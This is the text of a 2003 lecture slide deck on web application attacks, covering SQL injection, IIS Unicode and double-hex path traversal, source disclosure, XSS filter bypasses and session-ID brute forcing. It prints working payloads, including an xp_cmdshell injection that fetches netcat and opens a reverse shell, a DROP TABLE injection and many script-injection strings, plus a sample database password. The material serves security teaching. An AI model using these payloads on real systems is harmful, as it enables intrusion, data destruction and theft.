Network Security
Part II: Attacks
Web Attacks
Overview
• Web Architecture
• Web Hack Attacks
SECURITY INNOVATION ©2003
Web Architecture
• Web applications are important and this
importance is accelerating
• Web applications are complex and this
complexity is accelerating
SECURITY INNOVATION ©2003
This is Not New
•Problems with web applications are the same
problems with standalone applications
SECURITY INNOVATION ©2003
Why Target the Web
• Everyone is using it
• Safe bet the protocol will not become
obsolete anytime soon
• New technology is being implemented/
retrofitted on top (e.g. SOAP, WebDAV)
• It’s everywhere! Mobile phones, cars,
watches, toasters…
• Protocol fundamentally not suited to do a
majority of what it’s doing today
SECURITY INNOVATION ©2003
The Trouble with HTTP
• Multitude of involved technologies
• The involved protocols are extremely simple;
therefore, it is easy to (mis)code services on
your own HTTP server
• Lack of experience coding public service type,
multi-user applications
• Stateless nature makes transaction based
systems tricky
SECURITY INNOVATION ©2003
How Did We Get Here?
• Unskilled/robotic programmers (“code
mills”)
• Lack of security-oriented programming
training
• Tendency to ‘code now, fix later’
• Current tools make it very easy to code
insecurely
• Misconceptions about what ‘security’ really
involves
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• Buffer overflows
– Classic bug that’s been exploited for quite a while
– Lack of bounds-checking in the language a
majority of web applications are written in
combined with poor programming practice
– Can exist in the web server, application server,
database server, or the CGI programs
– Fortunately it’s a well-advertised problem
– Many scripting languages (ASP, PHP, Perl, .NET,
etc) are generally immune, as they have autoexpanding elements
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• Cross-site scripting
– Reprinting user data without filtering it for webspecific characters
– Potential to trick users into executing java script in
vulnerable site’s context
– Partly a ‘social engineering’ technique
– More of a liability than a vulnerability—it’s a way
to hack the users, not the server
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• SQL tampering
– Web server already has/allows access to the
database server
– Attacker can cause arbitrary SQL to be executed
– Results vary from data exposure to full system
compromise
– Does not require direct database access!
– Many applications are vulnerable
– Stems from CGIs/scripts making assumptions
about user input and not double checking/filtering
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• File includes
– It’s common for a CGI to open and display or
manipulate the contents of a file on the server
– If the filename is composed of user-supplied
elements, an attacker may be able to trick the
server into opening another file
– Can lead to info disclosure or script or command
execution
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• Authentication weaknesses
– CGIs can fail to check credentials with every
request
– Thus you bypass the login script and directly
access the following scripts, without needing
username/password
– Or, certain actions/functions may not check for the
proper authentication
SECURITY INNOVATION ©2003
Trouble Prone Areas of the Web
• Weak session mechanism
– The session/state mechanism uses predictable
token IDs
– Or, the ID keyspace is too small for the number of
users
– Either way, an attacker can ‘guess’ a valid token
and hijack the session
SECURITY INNOVATION ©2003
Mid Range E-Commerce Roll-Out
•
•
•
•
•
Web Server
Application Server
Database Server
… and a Firewall
Maybe some options…
– Load Balancer
– Reverse Proxy servers
– Cache systems
SECURITY INNOVATION ©2003
Typical Web Application Set-Up
HTTP
request
(cleartext
or SSL)
Web
Client
SQL
Database
Firewall
Web app
Web
Server
Web app
Web app
DB
DB
Web app
HTTP reply
(HTML,
Javascript,
VBscript,
etc)
•Apache
•IIS
•Netscape
etc…
SECURITY INNOVATION ©2003
Plugins:
•Perl
•C/C++
•JSP, etc
Database
connection:
•ADO,
•ODBC, etc.
Traditional Hacking
• Targeted against vulnerabilities in OS
components and Network services.
– Buffer overflows
• Not portable; attacks specific to operating
system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS
platforms, CPU architectures, etc.
SECURITY INNOVATION ©2003
Traditional Hacking
• Requires specialized
coding skills such as
writing shell-code for
buffer-overflows, etc.
• In short, it is a complex
activity with a limited
practitioner base.
...
winsock_found:
xor
push
inc
push
inc
push
call
cmp
jnz
push
push
call
jmp
socket_ok:
mov
mov
mov
...
SECURITY INNOVATION ©2003
eax, eax
eax
eax
eax
eax
eax
socket
eax, -1
socket_ok
sockerrl
offset sockerr
write_console
quit2
sock, eax
sin.sin_family, 2
esi, offset _port
Limitations of Traditional
Hacking…
• Modern network architectures are getting
more robust and secure.
• Firewalls being used in almost all network
roll-outs.
• OS vendors learning from past mistakes (?)
and coming out with patches rapidly.
• Increased maturity in coding practices.
SECURITY INNOVATION ©2003
Utility of Firewalls
Hacks on OS
network services
prevented by
firewalls
SQL
Database
Firewall
Web app
Web
Server
wu-ftpd
Web app
Web app
Web app
X
Sun RPC
X
NT ipc$
X
Limits Traditional hacking
SECURITY INNOVATION ©2003
DB
DB
Utility of Firewalls
SQL
Database
Firewall
Web app
Web
Server
Web app
Web app
DB
DB
Web app
X
Internal back-end application
servers are on a non-routable
IP network. (Private
Addresses)
SECURITY INNOVATION ©2003
Utility of Firewalls
SQL
Database
Firewall
Web app
Web
Server
Web app
Web app
DB
DB
Web app
X
Outbound access
restricted. Why would a
web server telnet out?
SECURITY INNOVATION ©2003
Futility of Firewalls
• Web traffic is the most commonly allowed of
any of the protocols through enterprise
firewalls.
• HTTP is perceived as friendly traffic
• Why lay siege to the wall when you have a
open door.
• Attacks that based on Content/Applications
applications are still viewed by some as rare.
SECURITY INNOVATION ©2003
Tools Required for Web Hacking
• A web browser
• An Internet connection
• ….a clear mind and some spare time!
SECURITY INNOVATION ©2003
A Classification of Web Hacks
• Web attacks fall under the following general
categories:
–
–
–
–
–
Buffer overflow attacks
SQL injection attacks
Input validation attacks
URL interpretation attacks
Impersonation attacks
SECURITY INNOVATION ©2003
Firewalls Cannot Prevent…
• Complexity
mismanagement
• Indifference
Firewall
Web
Client
Web
Server
Web server
misconfiguration
SECURITY INNOVATION ©2003
Attack the Architecture
html
handler
text/html
header
cgi
handler
shtml
include
file
text/html
header
shtml
handler
Web
Server
html
Process
SSI tags
#include
#exec
text/html sh,
header perl,…
/bin/sh
cgi
Process
Java
JSP tags Compiler
jsp
handler
jsp
Java Runtime
default
handler
??
SECURITY INNOVATION ©2003
class
script/
execu-table
Web Server Architecture
Attacks
• Complex web server architectures are can lead to
implementation vulnerabilities.
• A common attack is to bypass the web server
configuration directives, and invoke the built-in
procedures directly.
• A close look at the web server architecture can reveal
security problems.
SECURITY INNOVATION ©2003
Architecture Misconfigurations
• Handler Forcing:
– Certain mis-configurations allow handlers to be
forced onto files that are not supposed to be
processed by them.
– Forcing a default handler onto a CGI file can cause
the contents of the CGI file to be returned “as-is”.
• Forcing a JSP handler onto an HTML file can
cause the contents of the HTML file to be
compiled by the Java compiler and executed
by the Java run-time machine
SECURITY INNOVATION ©2003
JSP Handler Forcing
html
handler
text/html
header
html
JSP
PageCompile
handler forced on
to html files
Web
Server
jsp
handler
Process
JSP tags
Java
Compiler
Java Runtime
class
SECURITY INNOVATION ©2003
Firewalls Cannot Prevent…
Firewall
Web app
Web app
Web
Client
Web
Server
Web app
Web app
•
Input validation
attacks
URL
Interpretation
attacks
SECURITY INNOVATION ©2003
Poor
checking of
user inputs
URL Interpretation Attacks
• Several well known vulnerabilities in Windows NT
and Internet Information Services dating from
Autumn 2000, have been wrapped into a common
definition: "The Unicode Bug."
• URL Parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands
on the web server under the context of IUSR.
• Can lead to potential Administrator level access.
SECURITY INNOVATION ©2003
The IIS Unicode Bug
• Exploit:
http://10.0.0.1/scripts/..%c0%af../
winnt/system32/cmd.exe?/c+dir+c:\
– attacker could view a directory listing of a server's
C:\ drive
• %c0%af = “/”
• Can use HTTP POST to send multiple
commands at a time to cmd.exe.
SECURITY INNOVATION ©2003
Web Hacking for Collateral
Damage
•
Web hacking can result in three types of
collateral damage.
1.
Information disclosure (paths etc.)
•
Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)
3. Arbitrary command execution
SECURITY INNOVATION ©2003
Source Code Disclosure
"Use the Source, Luke!“
• WebLogic / WebSphere “JSP” bug1.
• Ability to retrieve source code of JSP/JHTML
files.
• Using uppercase “JSP” in the URL causes the
server to return unparsed JSP code.
1. Discovered by Shreeraj Shah, Foundstone.
SECURITY INNOVATION ©2003
A Classic Case of “Handler
Mismatch."
HTTP
Request:
index.JSP
WebLogic Server
html
handler
shtml
handler
weblogic.httpd.register.file=
weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=
weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=
weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=
weblogic.servlet.JSPServlet
index.JSP = index.jsp
jhtml
handler
jsp
handler
X
index.jsp
Process
Java
JSP tags Compiler
Java
Runtime
default
handler
SECURITY INNOVATION ©2003
More Source Disclosure
• URL prefixes for source code disclosure1:
/servlet/file/
/file/
/*.shtml/
/ConsoleHelp/
(IBM WebSphere)
(BEA WebLogic)
(BEA WebLogic)
(BEA WebLogic)
/servlet/com.sun.server.http.servlet.FileServlet/
(Sun JavaWebServer)
1 Advisories located on: http://www.foundstone.com/advisories.htm
SECURITY INNOVATION ©2003
…I Thought it was Functionality
• IIS “+.htr” bug.
– View source code of ASP/ASA files.
– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.
– Characters after the “+” sign (space) are ignored.
SECURITY INNOVATION ©2003
Doom on You….
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
Set Db = Server.CreateObject("Commerce.DbServer")
Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
Db.Application = "http://10.1.1.16/"
Set Application("Db")
= Db
End Sub
Sub Session_OnStart
'==Visual InterDev Generated - DataConnection startspan==
'--Project Data Connection
Session("DataConn_ConnectionString") =
"DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;
FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
Session("DataConn_ConnectionTimeout") = 15
Session("DataConn_CommandTimeout") = 30
Session("DataConn_RuntimeUserName") = ""
Session("DataConn_RuntimePassword") = ""
'==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>
User ID: sa
Password: n0t4u2c
SECURITY INNOVATION ©2003
More Source Disclosure
• Some applications access files without
appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or
location.
• Filenames can be manipulated via parameters
passed on the URL or as hidden fields.
SECURITY INNOVATION ©2003
NT IIS Showcode ASP
Vulnerability
• Active Server Page (ASP) script installed by
default on Microsoft's Internet Information
Server (IIS) 4.0
• Gives remote users access to view any file on
the same volume as the web server that is
readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode
asp?source=/msadc/Samples/../../../../../boot.ini
SECURITY INNOVATION ©2003
Firewalls Cannot Prevent…
HTTP
request
(cleartext
or SSL)
Web
Client
SQL
Database
Firewall
Web app
Web
Server
Web app
DB
Web app
DB
Web app
•
SQL Query
Poisoning
URL
Interpretation
attacks
SECURITY INNOVATION ©2003
Input
validation
attacks
Extend SQL
statements
SQL Query Poisoning
• Poor input validation on parameters passed to
SQL queries can be disastrous.
• Return all rows:
http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
SECURITY INNOVATION ©2003
SQL Query Poisoning
• Drop Table:
http://10.0.0.3/showtable.asp?ID=3%01DRO
P+TABLE+PRODUCT
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3
DROP TABLE PRODUCT
SECURITY INNOVATION ©2003
SQL Query Poisoning
• Remote Command Execution!
http://10.0.0.3/showtable.asp?
ID=3%01EXEC+master..xp_cmdshell+
‘tftp+-i+10.0.0.13+GET+nc.exe+
%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed:
tftp -i 10.0.0.13 GET nc.exe &&
nc -e cmd.exe 10.0.0.11 2000
SECURITY INNOVATION ©2003
SQL Remote Commando
ASP
1
Web
Browser
C:\>_
IIS
3
SELECT * FROM PRODUCT WHERE ID=3
EXEC master..xp_cmdshell
tftp -i 10.0.0.13 GET nc.exe &&
nc -e cmd.exe 10.0.0.11 2000
2
nc.exe
listener at port
2001 to
receive the
connection
DB
tftp
server
tftp server to get
nc.exe transferred
over to the NT IIS
box.
SECURITY INNOVATION ©2003
Firewalls Cannot Prevent…
Reverse
engineering HTTP
cookies
SQL
Database
Firewall
Web app
Web
Client
Web
Server
Web app
Web app
DB
DB
Web app
 HTTP
session
hijacking
URL
Interpretation
attacks
•Impersonation
SECURITY INNOVATION ©2003
Input
validation
attacks
SQL query
poisoning
Firewalls Cannot Prevent…
HTTP
request
(cleartext
or SSL)
Web
Client
SQL
Database
Firewall
Web app
Web
Server
Web app
Web app
DB
DB
Web app
HTTP reply
(HTML,
Javascript,
VBscript,
etc)
•Apache
•IIS
•Netscape
etc…
•Application bugs
SECURITY INNOVATION ©2003
Plugins:
•Perl
•C/C++
•JSP, etc
Database
connection:
•ADO,
•ODBC, etc.
The MDAC Attack
• Vulnerability with Microsoft Data Access
Components (msadcs.dll).
• MDAC allows remote users to perform SQL
queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute
arbitrary commands.
SECURITY INNOVATION ©2003
The MDAC Attack
msadcs.dll
Client
Internet
Explorer
or VB.exe
HTML
IIS
ASP
Server
(ADO)
Server
OBDC
Provider
OBDC
Remote Data Service
RDS Data
Control
URL
RDS
OLE
Data
Factory
DB
Jet
Provider
RDS Data
Space
Custom
Business
Objects
SECURITY INNOVATION ©2003
Jet
3.5
The MDAC Attack
• Exploit:
$query="Select * from Customers
where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 .
"\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
• Gain Administrator Privileges on NT!
SECURITY INNOVATION ©2003
The MDAC Attack in Action
msadcs
dll
1
mdac.pl
(exploit)
C:\>_
IIS 4.0
SELECT * FROM Customers WHERE
City = “|shell($command)
3
2
nc.exe
listener at
port 2001 to
receive the
connection
DB
tftp
server
tftp server to get
nc.exe transferred
over to the NT IIS
box.
SECURITY INNOVATION ©2003
The Effectiveness of Web Hacking
• By default ports 80 and 443 are usually
allowed through firewalls. The open door…
• A single URL string is able to be processed by
many different components.
• In most cases the only defense is reliance on
secure coding.
SECURITY INNOVATION ©2003
Missile of Death
http: // 10.0.0.1 /
catalog
/ display.asp ? pg = 1 & product = 7
Web app
Web
Server
Web app
Web app
Web app
SECURITY INNOVATION ©2003
DB
DB
Cross Site Scripting, Why You
Should Care.
•XSS is not an attack on the server, it is an
attack on the users of your application
•So what?
– Identity theft
– User masquerading
– Reputation Risk
SECURITY INNOVATION ©2003
Cross Site Scripting (XSS)
•Found in 98% of applications
•2 main types
– Transient (URL basedP
http://badapp.com/error.jsp?msg=<SCRIPT>alert("Tes
t");</SCRIPT>
– Sticky – Script placed in a static bit of web content
SECURITY INNOVATION ©2003
XSS continued…
•Transient generally requires user interaction
•What can happen?
– Possibilities are only restricted by the client
– Cookie theft most common example
•But I filter “<“ and “>”
– Jscript entities “&{alert(‘Test')};”
SECURITY INNOVATION ©2003
Session Hijacking
•HTTP is stateless so application designers
must build a way to track state
•Cookies and URL strings are the most common
ways to track state
•Both are easily exploitable
SECURITY INNOVATION ©2003
Session Hijacking Continued…
•Generally the next thing to occur after XSS
•Examples of common session tracking issues
SECURITY INNOVATION ©2003
Parameter Tampering
•Programmers will store data anywhere!
– URL parameters
http://badapp.com/checkout.pl?p=$1.00
– Cookies – Cookie:p=$1.00
– Hidden fields – not really hidden
SECURITY INNOVATION ©2003
Unbound File Calls
•Ye Ole’ ../../
•Becomes an issue with the display important
information (global.asa)
•Most application languages will take URL’s as
file arguments
SECURITY INNOVATION ©2003
Do You Know Where Your
Data is?
•Building an exclusionary filter is difficult
because your data is all over the place
SECURITY INNOVATION ©2003
Data Flow Example
Internet
Orders
Database
Database
www.hackme.com
Marketing
Database
SECURITY INNOVATION ©2003
Customer
Service
Database
Designing a proper filter
•Make all filters default deny
– Don’t try to exclude “bad stuff”
•Requires a good idea where your data is going
•Log all filter violations
SECURITY INNOVATION ©2003
Filter Bypassing is a Technique
to Evade Detection by Filtering
Systems.
• Filter Bypassing techniques come in many varieties when
applied to the many facets of web application security.
• The general idea of performing the various techniques
described is to successfully bypass security measures
designed to prevent certain types/amounts/values of data
from being passed into a given system.
• Many of the described techniques can be highly effective
when used properly and even become more powerful
when used in combination.
SECURITY INNOVATION ©2003
Most filter systems are very
simple
Seven forms of ingenuity:
•
•
•
•
•
•
•
URL Encoded Strings
Double Hex Encoding
Unicode Encoded String
Long URLs
Case Sensitivity
XSS Filter-Bypass Manipulation
Null Character Injection
SECURITY INNOVATION ©2003
The Hex Advantage
By URL hex encoding URL strings, it may be possible
circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63
%2F%70%61%73%73%77%64
SECURITY INNOVATION ©2003
Double Hex Encoding
• In September 2001, the Nimda
worm spread throughout the
Internet taking advantage of a
Microsoft IIS vulnerability.
• The vulnerability was called
an Escaped Character
Decoding Vulnerability,
which involves double hex
encoding of a URL.
• An attacker or automated
script would craft a URL so
that it contained special hexencoded sequences to exploit
a vulnerability.
• When an un-patched,
vulnerable Microsoft IIS
server received the encoded
URL, one round of hex
decoding was performed on
the path in the URL.
• IIS then performed a security
check on the decoded URL,
but afterwards performed a
second round of hex
decoding.
• This secondary decoding was
the source of another
Vulnerability.
SECURITY INNOVATION ©2003
IIS Double Hex
Round 1 Decoding:
scripts/..%255c../winnt
becomes:
scripts/..%5c../winnt
(%25 = “%” Character)
Round 2 Decoding:
scripts/..%5c../winnt
becomes:
scripts/..\../winnt
Directory path traversal is now possible using path
obfuscation through Double Hex Encoding.
SECURITY INNOVATION ©2003
The Unicode Slash
• In unicode, “%c0%af”, is the equivilent to a slash
(“/”).
• Therefore the common URL IIS exploit:
scripts/..%c0%af../winnt
• becomes: scripts/../../winnt
Once again, directory path traversal is now possible
using path obfuscation through Unicode.
SECURITY INNOVATION ©2003
Double Slash
•Double Slash using multiple directory slashes
in URLs. For example:
http://www.foo.com/..//etc//passwd.
•Can be used to move under the radar of IDS
systems and still function properly.
SECURITY INNOVATION ©2003
Long URL’s
•Many system put limits on how much data a
variable can store or a system can handle.
•Often times if these limits are exceeded, the
data will still be used, but bypass certain
security considerations.
• URL’s such as:
http://www.foo.com/cgi?param=filename
• Replaced with:
http://www.foo.com/cgi?param=<2K_of_Data>
SECURITY INNOVATION ©2003
Case Sensitivity
• Case sensitivity may play a roll in many security
filtration systems.
• Alternating case on URL parameters may be used to
bypass certain restrictions.
http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR
SECURITY INNOVATION ©2003
Method Switching
• Many web applications do not properly perform HTTP
Request Method sanity checking.
• Performing Method Switching can be used to bypass IDS,
logging features and CGI security mechanisms.
• Most web servers do not log "POST" data and thus
forensic analysis is harder to perform.
The Request Method:
can become:
GET /cgi-bin/some.cgi
POST /cgi-bin/some.cgi
SECURITY INNOVATION ©2003
HTTP 1.1 Methods
The Method token indicates the
method to be performed on the
resource identified by the
Request-URI.
•
•
•
•
•
•
•
•
OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
CONNECT
SECURITY INNOVATION ©2003
Using your “HEAD”
• The “HEAD” request method can be used to
determine if a particular HTTP resource is accessible
without actually downloading the resource data.
Scans and web
application attacks
can be made to be
more effective
using this
technique.
SECURITY INNOVATION ©2003
Null Character Injection
• Hex encoded null characters can
be used to thwart some security
mechanisms.
• This happens because in the “C”
programming language, a null
character designates the end of a
string.
• So If a CGI appending a “.html” to
an input parameter:
http://foo.com/cgi?file=../../etc
/passwd%00
• Will cut off appending “.html”.
SECURITY INNOVATION ©2003
Unicode (UTF-8) Encoded
• Unicode is a universal way to
represent characters.
• However, unicode can also be
used to circumvent security
mechanisms by representing
information in another
fashion.
• Microsoft IIS has had security
issues in the past while
supporting unicode.
SECURITY INNOVATION ©2003
URL Encoded String
• The specification for URLs
(RFC 1738, Dec. '94) poses a
problem in that it limits the
use of allowed characters in
URLs to only a limited subset
of the US-ASCII character set:
• "...Only alphanumerics [0-9azA-Z], the special characters
"$_.+!*'()," [not including the
quotes - ed], and reserved
characters used for their
reserved purposes may be
used unencoded within a
URL."
SECURITY INNOVATION ©2003
XSS Filter-Bypass Manipulation
• This technique is used
pass various types of
client-side scripting
language through
implemented security
filters.
• The idea is to be able to
achieve client-side
execution of a client-side
script.
• There are several
techniques used to
perform this attack.
SECURITY INNOVATION ©2003
Hammer the Filters
•Submit all the raw HTML tags you can find,
and then view the output results.
•Combine HTML with tag attributes, such as
SRC, STYLE, HREF and OnXXX (JavaScript
Event Handler).
•This will show what HTML is allowed, what
the changes were, and possible dangerous
HTML that can be exploited.
SECURITY INNOVATION ©2003
SRCing the Protocol
•Using the “javascript” protocol in an HTML
source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
SECURITY INNOVATION ©2003
Alternate Protocol SRCing
•Same technique as the previous, however,
using the protocol “livescript” and “mocha”
will yield the same effect.
<IMG SRC=“livescript:js_expression">
<IMG SRC=“mocha:alert('test');">
SECURITY INNOVATION ©2003
Decimal HTML Entities
•Variation on previous techniques, using
decimal HTML entities between the protocol
characters can be used to bypass filters, yet still
execute JavaScript.
<IMG SRC=“java&#010;script:js_expression">
•\09 \10 \11 \12 \13 have all been seen to
work
SECURITY INNOVATION ©2003
Hex HTML Entities
•Another variation on the previous example,
HEX HTML entities may also be used to
bypass filter restriction, yet execute JavaScript.
<IMG SRC=“java&#X0A;script:js_expression">
SECURITY INNOVATION ©2003
Padding HTML Entities
•Padding HTML entities with “0’s” may also be
used to bypass the filters, yet still execute
JavaScript.
<IMG SRC=“java&#000009;script:js_expression">
SECURITY INNOVATION ©2003
STYLE JavaScript Type
•Changing the MIME-TYPE on a “style” tag
may be used to execute JavaScript.
<style TYPE="text/javascript">
JS EXPRESSION
</style>
<style TYPE="text/javascript">
Alert(document.domain);
</style>
SECURITY INNOVATION ©2003
STYLE JavaScript X-Type
•Variation on the previous example, but by
using the “application/x-javascript” MIMETYPE, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
SECURITY INNOVATION ©2003
STYLE JavaScript Import
•Using the @import feature in CSS may be used
to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is
executed'));
</style>
SECURITY INNOVATION ©2003
STYLE URL Import
•Using the @import feature in CSS can also be
used to import JavaScript from another HTTP
resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
SECURITY INNOVATION ©2003
LINK Style Sheet
•The “LINK” tag can be used to import
JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript"
SRC="javascript_path.js">
SECURITY INNOVATION ©2003
Style Left Expression
•A few CSS features used together to execute
JavaScript.
<PSTYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >
SECURITY INNOVATION ©2003
Remote SRCing
•A few HTML tags, such as “LAYER”,
“ILAYER”, “FRAME”, and “IFRAME” can be
used to src in JavaScript from remote
resources.
<LAYER SRC="js.html"></LAYER>
<LAYER SRC="js.html"></LAYER>
SECURITY INNOVATION ©2003
…AND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert(‘alert’)};">
•Syntax must be exact.
SECURITY INNOVATION ©2003
Dangerous HTML Tags
•“All HTML is to
be considered
dangerous, but
these tags are the
most insidious.”
–
–
–
–
–
–
–
–
–
–
–
–
–
–
SECURITY INNOVATION ©2003
<APPLET>
<BODY>
<EMBED>
<FRAME>
<FRAMESET>
<HTML>
<IFRAME>
<IMG>
<LAYER>
<ILAYER>
<META>
<OBJECT>
<SCRIPT>
<STYLE>
Dangerous HTML Attributes
•(HTML Tags with these attributes.)
–
–
–
–
SRC
LOWSRC
STYLE
HREF
SECURITY INNOVATION ©2003
Web Applications Logins
SECURITY INNOVATION ©2003
Traditional Brute Force
guest
Admin
123123
Password
Etc.
SECURITY INNOVATION ©2003
Session ID Overview
•HTTP is stateless protocol
•Rather than make a user authenticate upon
each click in a web application, a sense of
“state” is created
•In order to maintain state, a shared string,
token, or secret between HTTP client and
server is usually used by developers
•Essentially, authentication data
(username/password) exchanged for “Session
ID”
SECURITY INNOVATION ©2003
Web State Attacks
•Session Replay
– A traditional replay attack in the cryptography sense is an
attack in which a valid data transmission is maliciously or
fraudulently repeated, either by the originator or by an
adversary who intercepts the data and retransmits it.
•Session Hijacking
– Seizing control of a legitimate user's web application
session while that user is “logged in” to the application
SECURITY INNOVATION ©2003
Session ID
• Session ID should IN THEORY be just as
secure as username/password
SECURITY INNOVATION ©2003
Session ID Overview
• While it is generally clear that
username/password pairs are indeed
authentication data and therefore sensitive, it
is not generally understood that session IDs
are also just as sensitive because of their
frequent use for authentication. See RFC 2964
(Use of HTTP State Management).
SECURITY INNOVATION ©2003
Session ID Overview
• Session IDs are commonly stored in cookies
and/or URLs, and hidden fields of web pages
(or some combination)
• Session ID generated by WEB SERVER (IIS,
etc.) when the user first hits the site or by
WEB APPLICATION (ATG dynamo, Apache
Tomcat, BEA Websphere, .jsp, .asp, perl, etc.)
when the user logs in
SECURITY INNOVATION ©2003
Cookie Refresher
• Sometimes the cookies are set to expire (i.e., be
deleted) upon closing the browser; these are typically
called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user’s session (i.e.
“Remember Me” option)
• Persistent cookies are usually stored on the user’s hard
drive in a location according to the particular
operating system and browser (e.g. , C:\Program
files\netscape \users\username\cookies.txt for
Netscape and C:\Documents and Settings
\username\Cookies for IE on Win2K).
SECURITY INNOVATION ©2003
Cookie Refresher
•Cookie Refresher (RFC 2965)
1
www.redhat.com
2
3
FALSE
/
4
FALSE
5
1154029490
6
Apache
7
64.3.40.151.16018996349247480
1.) domain: The website domain that created and that can read the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the
variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the
variable.
5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of
seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals to the browser to store
the cookie only in memory; it will be erased when the browser is closed. (expires July 27, 2006)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480 ) .
SECURITY INNOVATION ©2003
Cookie Stored Session ID
Examples
.starwars.com
TRUE
/
FALSE
.www.ibm.com
TRUE
/rc
.ebay.com
TRUE
/
.amazon.com
FALSE
/
.yahoo.com
TRUE
/
FALSE
1271361612
B
3qpaarsu48dai&b=2
.yahoo.com
TRUE
/
FALSE
1154029490
I
ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com
TRUE
/
FALSE
1154029490
PU
t=1
FALSE
1341753778
1293768100
FALSE
1183296824
FALSE
1026115299
WookieCookie
sauidp
lucky8
session-id
SECURITY INNOVATION ©2003
13fe8fff4799f27dcf19c959dafa8437
p0010000000006DCC102552982300005
91992.003F75FEF2
694036
103-1456769-7895034
URL Stored Session ID
•
•
•
•
http://www.123greetings.com/view/7AD30725122120803
http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS
http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJ
CGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/1024524380-3923344
SECURITY INNOVATION ©2003
Session IDs in HTML Hidden
Fields
<FORM METHOD=POST ACTION="/cgibin/bankonline.cgi">
<input type="hidden"
name="sessionID" value=”abcde1234”>
<input type="hidden"
name="useraccount" value=”67312745”>
<input type="submit" name="Access My
Bank Information"></form>
SECURITY INNOVATION ©2003
Session ID Security Overview
Session ID security
is a microcosm of
Web Application
Security.
Web Application
Security cuts through
many different
aspects of an
organization’s
information security
infrastructure
SECURITY INNOVATION ©2003
An Example: Brute Forcing Session ID’s in URLS
Dear Terry Gillette,
An Anonymous Admirer has sent you a greeting card from 123Greetings.com,
a FREE service committed to keep people in touch.
To see your greeting card, choose from any of the following options which
works best for you.
-------Method 1
-------Just click on the following Internet address (if that doesn't work for you, copy
& paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
SECURITY INNOVATION ©2003
An Example: Brute Forcing
Session ID’s in URLS
http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
As we start to associate that the date we sent these electronic cards
on was July 25 at 12:21 PST, we can start to eliminate some more
entropy out of this session ID (07251221). Notice then that we’re
left with five incrementing “random” digits at the end of the URL.
http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
SECURITY INNOVATION ©2003
An Example: Brute Forcing Session ID’s
in URLS AUTOMATED DEMO!
SECURITY INNOVATION ©2003
Why Brute Forcing Web Session
ID’s is Bad
•
•
•
•
•
•
•
•
Can result in an online user’s web application
account being hijacked or loss of privacy
Easy to exploit
Unlike typical login scenario, no failed login lockout
Prevalent disclosure among security mailing lists
Typical security solutions (firewalls, IDS, etc.) do
nothing to detect attacks
Log data is usually not that detailed
IDS is not well developed for Web Application
attacks
SSL (Server side) does nothing to protect against
these attacks
SECURITY INNOVATION ©2003
In the News
– “Privacy hole found in Verizon Wireless
Web site “ Computerworld, Sept 6, 2001.
